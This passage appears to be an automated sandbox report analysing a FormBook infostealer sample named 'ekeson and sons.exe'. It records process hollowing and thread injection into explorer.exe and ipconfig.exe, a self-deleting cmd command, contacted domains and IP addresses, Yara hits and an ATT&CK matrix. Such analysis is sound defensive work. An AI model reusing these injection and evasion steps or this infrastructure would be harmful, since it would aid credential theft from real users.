      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BB02A mov eax, dword ptr fs:[00000030h]10_2_036BB02A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BB02A mov eax, dword ptr fs:[00000030h]10_2_036BB02A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BB02A mov eax, dword ptr fs:[00000030h]10_2_036BB02A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03774015 mov eax, dword ptr fs:[00000030h]10_2_03774015
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03774015 mov eax, dword ptr fs:[00000030h]10_2_03774015
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03727016 mov eax, dword ptr fs:[00000030h]10_2_03727016
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03727016 mov eax, dword ptr fs:[00000030h]10_2_03727016
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03727016 mov eax, dword ptr fs:[00000030h]10_2_03727016
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A58EC mov eax, dword ptr fs:[00000030h]10_2_036A58EC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A40E1 mov eax, dword ptr fs:[00000030h]10_2_036A40E1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A40E1 mov eax, dword ptr fs:[00000030h]10_2_036A40E1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A40E1 mov eax, dword ptr fs:[00000030h]10_2_036A40E1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373B8D0 mov eax, dword ptr fs:[00000030h]10_2_0373B8D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0373B8D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373B8D0 mov eax, dword ptr fs:[00000030h]10_2_0373B8D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373B8D0 mov eax, dword ptr fs:[00000030h]10_2_0373B8D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373B8D0 mov eax, dword ptr fs:[00000030h]10_2_0373B8D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373B8D0 mov eax, dword ptr fs:[00000030h]10_2_0373B8D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E90AF mov eax, dword ptr fs:[00000030h]10_2_036E90AF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A0 mov eax, dword ptr fs:[00000030h]10_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A0 mov eax, dword ptr fs:[00000030h]10_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A0 mov eax, dword ptr fs:[00000030h]10_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A0 mov eax, dword ptr fs:[00000030h]10_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A0 mov eax, dword ptr fs:[00000030h]10_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A0 mov eax, dword ptr fs:[00000030h]10_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DF0BF mov ecx, dword ptr fs:[00000030h]10_2_036DF0BF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DF0BF mov eax, dword ptr fs:[00000030h]10_2_036DF0BF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DF0BF mov eax, dword ptr fs:[00000030h]10_2_036DF0BF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A9080 mov eax, dword ptr fs:[00000030h]10_2_036A9080
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03723884 mov eax, dword ptr fs:[00000030h]10_2_03723884
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03723884 mov eax, dword ptr fs:[00000030h]10_2_03723884
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BFF60 mov eax, dword ptr fs:[00000030h]10_2_036BFF60
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03778F6A mov eax, dword ptr fs:[00000030h]10_2_03778F6A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BEF40 mov eax, dword ptr fs:[00000030h]10_2_036BEF40
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A4F2E mov eax, dword ptr fs:[00000030h]10_2_036A4F2E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A4F2E mov eax, dword ptr fs:[00000030h]10_2_036A4F2E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DE730 mov eax, dword ptr fs:[00000030h]10_2_036DE730
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373FF10 mov eax, dword ptr fs:[00000030h]10_2_0373FF10
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373FF10 mov eax, dword ptr fs:[00000030h]10_2_0373FF10
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DA70E mov eax, dword ptr fs:[00000030h]10_2_036DA70E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DA70E mov eax, dword ptr fs:[00000030h]10_2_036DA70E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0377070D mov eax, dword ptr fs:[00000030h]10_2_0377070D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0377070D mov eax, dword ptr fs:[00000030h]10_2_0377070D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CF716 mov eax, dword ptr fs:[00000030h]10_2_036CF716
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E37F5 mov eax, dword ptr fs:[00000030h]10_2_036E37F5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03727794 mov eax, dword ptr fs:[00000030h]10_2_03727794
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03727794 mov eax, dword ptr fs:[00000030h]10_2_03727794
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03727794 mov eax, dword ptr fs:[00000030h]10_2_03727794
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B8794 mov eax, dword ptr fs:[00000030h]10_2_036B8794
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B766D mov eax, dword ptr fs:[00000030h]10_2_036B766D
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CAE73 mov eax, dword ptr fs:[00000030h]10_2_036CAE73
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CAE73 mov eax, dword ptr fs:[00000030h]10_2_036CAE73
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CAE73 mov eax, dword ptr fs:[00000030h]10_2_036CAE73
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CAE73 mov eax, dword ptr fs:[00000030h]10_2_036CAE73
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CAE73 mov eax, dword ptr fs:[00000030h]10_2_036CAE73
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B7E41 mov eax, dword ptr fs:[00000030h]10_2_036B7E41
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B7E41 mov eax, dword ptr fs:[00000030h]10_2_036B7E41
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B7E41 mov eax, dword ptr fs:[00000030h]10_2_036B7E41
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B7E41 mov eax, dword ptr fs:[00000030h]10_2_036B7E41
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B7E41 mov eax, dword ptr fs:[00000030h]10_2_036B7E41
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B7E41 mov eax, dword ptr fs:[00000030h]10_2_036B7E41
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376AE44 mov eax, dword ptr fs:[00000030h]10_2_0376AE44
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376AE44 mov eax, dword ptr fs:[00000030h]10_2_0376AE44
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0375FE3F mov eax, dword ptr fs:[00000030h]10_2_0375FE3F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036AE620 mov eax, dword ptr fs:[00000030h]10_2_036AE620
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036AC600 mov eax, dword ptr fs:[00000030h]10_2_036AC600
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036AC600 mov eax, dword ptr fs:[00000030h]10_2_036AC600
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036AC600 mov eax, dword ptr fs:[00000030h]10_2_036AC600
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D8E00 mov eax, dword ptr fs:[00000030h]10_2_036D8E00
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DA61C mov eax, dword ptr fs:[00000030h]10_2_036DA61C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DA61C mov eax, dword ptr fs:[00000030h]10_2_036DA61C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03761608 mov eax, dword ptr fs:[00000030h]10_2_03761608
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B76E2 mov eax, dword ptr fs:[00000030h]10_2_036B76E2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D16E0 mov ecx, dword ptr fs:[00000030h]10_2_036D16E0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03778ED6 mov eax, dword ptr fs:[00000030h]10_2_03778ED6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D36CC mov eax, dword ptr fs:[00000030h]10_2_036D36CC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E8EC7 mov eax, dword ptr fs:[00000030h]10_2_036E8EC7
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0375FEC0 mov eax, dword ptr fs:[00000030h]10_2_0375FEC0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03770EA5 mov eax, dword ptr fs:[00000030h]10_2_03770EA5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03770EA5 mov eax, dword ptr fs:[00000030h]10_2_03770EA5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03770EA5 mov eax, dword ptr fs:[00000030h]10_2_03770EA5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037246A7 mov eax, dword ptr fs:[00000030h]10_2_037246A7
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0373FE87 mov eax, dword ptr fs:[00000030h]10_2_0373FE87
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CC577 mov eax, dword ptr fs:[00000030h]10_2_036CC577
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036CC577 mov eax, dword ptr fs:[00000030h]10_2_036CC577
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E3D43 mov eax, dword ptr fs:[00000030h]10_2_036E3D43
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03723540 mov eax, dword ptr fs:[00000030h]10_2_03723540
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03753D40 mov eax, dword ptr fs:[00000030h]10_2_03753D40
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036C7D50 mov eax, dword ptr fs:[00000030h]10_2_036C7D50
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03778D34 mov eax, dword ptr fs:[00000030h]10_2_03778D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0372A537 mov eax, dword ptr fs:[00000030h]10_2_0372A537
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376E539 mov eax, dword ptr fs:[00000030h]10_2_0376E539
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D4D3B mov eax, dword ptr fs:[00000030h]10_2_036D4D3B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D4D3B mov eax, dword ptr fs:[00000030h]10_2_036D4D3B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D4D3B mov eax, dword ptr fs:[00000030h]10_2_036D4D3B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036AAD30 mov eax, dword ptr fs:[00000030h]10_2_036AAD30
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B3D34 mov eax, dword ptr fs:[00000030h]10_2_036B3D34
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03758DF1 mov eax, dword ptr fs:[00000030h]10_2_03758DF1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BD5E0 mov eax, dword ptr fs:[00000030h]10_2_036BD5E0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BD5E0 mov eax, dword ptr fs:[00000030h]10_2_036BD5E0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376FDE2 mov eax, dword ptr fs:[00000030h]10_2_0376FDE2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376FDE2 mov eax, dword ptr fs:[00000030h]10_2_0376FDE2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376FDE2 mov eax, dword ptr fs:[00000030h]10_2_0376FDE2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376FDE2 mov eax, dword ptr fs:[00000030h]10_2_0376FDE2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03726DC9 mov eax, dword ptr fs:[00000030h]10_2_03726DC9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03726DC9 mov eax, dword ptr fs:[00000030h]10_2_03726DC9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03726DC9 mov eax, dword ptr fs:[00000030h]10_2_03726DC9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03726DC9 mov ecx, dword ptr fs:[00000030h]10_2_03726DC9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03726DC9 mov eax, dword ptr fs:[00000030h]10_2_03726DC9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03726DC9 mov eax, dword ptr fs:[00000030h]10_2_03726DC9
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D35A1 mov eax, dword ptr fs:[00000030h]10_2_036D35A1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D1DB5 mov eax, dword ptr fs:[00000030h]10_2_036D1DB5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D1DB5 mov eax, dword ptr fs:[00000030h]10_2_036D1DB5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D1DB5 mov eax, dword ptr fs:[00000030h]10_2_036D1DB5
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037705AC mov eax, dword ptr fs:[00000030h]10_2_037705AC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037705AC mov eax, dword ptr fs:[00000030h]10_2_037705AC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A2D8A mov eax, dword ptr fs:[00000030h]10_2_036A2D8A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A2D8A mov eax, dword ptr fs:[00000030h]10_2_036A2D8A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A2D8A mov eax, dword ptr fs:[00000030h]10_2_036A2D8A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A2D8A mov eax, dword ptr fs:[00000030h]10_2_036A2D8A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A2D8A mov eax, dword ptr fs:[00000030h]10_2_036A2D8A
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 166.62.28.135 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.oruiz.services
      Source: C:\Windows\explorer.exeDomain query: www.booty1fitness.com
      Source: C:\Windows\explorer.exeDomain query: www.virtualpaycards.com
      Source: C:\Windows\explorer.exeDomain query: www.mirwanonline.com
      Source: C:\Windows\explorer.exeDomain query: www.rainmiser.com
      Source: C:\Windows\explorer.exeNetwork Connect: 98.124.204.16 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.231.56 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.astrobalajichennai.com
      Source: C:\Windows\explorer.exeDomain query: www.csmserver.com
      Source: C:\Windows\explorer.exeDomain query: www.activedevon.xyz
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.fitnesstower.net
      Source: C:\Windows\explorer.exeNetwork Connect: 75.2.26.18 80Jump to behavior
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\ekeson and sons.exeMemory written: C:\Users\user\Desktop\ekeson and sons.exe base: 430000 value starts with: 4D5AJump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\ekeson and sons.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ekeson and sons.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3440Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ekeson and sons.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\ekeson and sons.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 940000Jump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess created: C:\Users\user\Desktop\ekeson and sons.exe 'C:\Users\user\Desktop\ekeson and sons.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ekeson and sons.exe'Jump to behavior
      Source: explorer.exe, 00000003.00000000.403657848.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 0000000A.00000002.599113851.0000000005CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.363094824.00000000008B8000.00000004.00000020.sdmp, ipconfig.exe, 0000000A.00000002.599113851.0000000005CA0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000003.00000000.390268351.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.599113851.0000000005CA0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: explorer.exe, 00000003.00000000.390268351.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.599113851.0000000005CA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_00405B88

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 434779 Sample: ekeson and sons.exe Startdate: 15/06/2021 Architecture: WINDOWS Score: 100 27 www.kslobon.com 2->27 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 9 explorer.exe 2->9         started        13 ekeson and sons.exe 20 2->13         started        signatures3 process4 dnsIp5 29 www.fitnesstower.net 98.124.204.16, 49750, 80 ENOMAS1US United States 9->29 31 mirwanonline.com 45.130.231.56, 49753, 80 AS-HOSTINGERLT Germany 9->31 33 11 other IPs or domains 9->33 53 System process connects to network (likely due to code injection or exploit) 9->53 55 Performs DNS queries to domains with low reputation 9->55 57 Uses ipconfig to lookup or modify the Windows network settings 9->57 16 ipconfig.exe 9->16         started        25 C:\Users\user\AppData\Local\...\System.dll, PE32 13->25 dropped 59 Injects a PE file into a foreign processes 13->59 19 ekeson and sons.exe 13->19         started        file6 signatures7 process8 signatures9 35 Tries to detect virtualization through RDTSC time measurements 16->35 21 cmd.exe 1 16->21         started        37 Modifies the context of a thread in another process (thread injection) 19->37 39 Maps a DLL or memory area into another process 19->39 41 Sample uses process hollowing technique 19->41 43 Queues an APC in another process (thread injection) 19->43 process10 process11 23 conhost.exe 21->23         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ekeson and sons.exe30%VirustotalBrowse
      ekeson and sons.exe17%MetadefenderBrowse
      ekeson and sons.exe52%ReversingLabsWin32.Spyware.Noon
      ekeson and sons.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsdD06F.tmp\System.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\nsdD06F.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.0.ekeson and sons.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
      10.2.ipconfig.exe.3bb7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
      0.0.ekeson and sons.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
      1.2.ekeson and sons.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
      1.2.ekeson and sons.exe.430000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      10.2.ipconfig.exe.d105b0.2.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      www.csmserver.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      www.ponchomotor.icu/eo5u/0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
